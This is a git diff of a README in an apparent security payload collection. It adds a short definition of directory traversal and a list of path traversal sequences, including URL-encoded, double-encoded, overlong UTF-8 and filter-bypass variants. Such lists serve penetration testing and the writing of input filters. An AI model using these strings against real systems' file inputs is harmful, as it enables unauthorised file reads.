diff --git a/Traversal_Directory/README.md b/Traversal_Directory/README.md index c707ab4..fa53d19 100644 --- a/Traversal_Directory/README.md +++ b/Traversal_Directory/README.md @@ -1,12 +1,20 @@ -# Title -Lorem +# Traversal Directory +A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs. -## Vuln +## Exploit ``` -Code +../ +..\ +..\/ +%2e%2e%2f +%252e%252e%252f +%c0%ae%c0%ae%c0%af +%uff0e%uff0e%u2215 +%uff0e%uff0e%u2216 +..././ +...\.\ ``` ## Thanks to -* Lorem -* Ipsum \ No newline at end of file +* \ No newline at end of file